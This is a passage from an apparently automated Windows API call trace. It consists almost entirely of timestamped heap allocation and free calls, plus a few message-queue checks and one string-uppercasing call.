hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.956] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.956] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0167.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0167.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0167.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0167.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.959] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.960] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0167.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0167.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0167.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.962] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0167.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0167.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0167.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0167.963] HeapFree (in: 